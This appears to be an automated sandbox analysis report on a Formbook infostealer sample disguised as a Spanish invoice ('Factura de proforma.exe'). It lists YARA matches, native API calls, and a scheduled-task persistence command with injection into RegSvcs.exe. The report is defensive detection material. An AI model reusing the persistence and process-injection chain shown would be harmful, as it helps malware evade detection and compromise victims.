            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_0296F298
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_0296F288
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_0296D064
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041F04E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D97A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041EBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E3A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E437
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E1A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D72A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041EF37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EF900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B20A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B2B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B22AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B1D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B2D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E0D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B1FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01606E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B2EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E0D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EF900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B1D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04806E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481EBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AE872
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02999E1A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02999E60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02992FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD72A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02992D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 015EB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 047EB150 appears 32 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A360 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A410 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A490 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A35A NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A53A NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016299A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016298F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016295D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016297A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016296E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016299D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162B040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016298A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A80 NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162AD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016295F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A710 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629FE0 NtCreateMutant,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016296D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048299A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048295D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048296D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048296E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048298A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048298F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048299D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048295F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048297A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA360 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA490 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA410 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA540 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA35A NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA53A NtAllocateVirtualMemory,
            Source: Factura de proforma.exeBinary or memory string: OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.327421631.0000000007900000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000000.296727350.00000000007A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: i,\\StringFileInfo\\000004B0\\OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exeBinary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: tskpCbAwtxoaw.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Factura de proforma.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tskpCbAwtxoaw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile read: C:\Users\user\Desktop\Factura de proforma.exeJump to behavior
            Source: Factura de proforma.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Factura de proforma.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Factura de proforma.exe 'C:\Users\user\Desktop\Factura de proforma.exe'
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Users\user\Desktop\Factura de proforma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD689.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@4/1
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Factura de proforma.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Factura de proforma.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cscript.exe
            Source: Binary string: RegSvcs.pdb source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
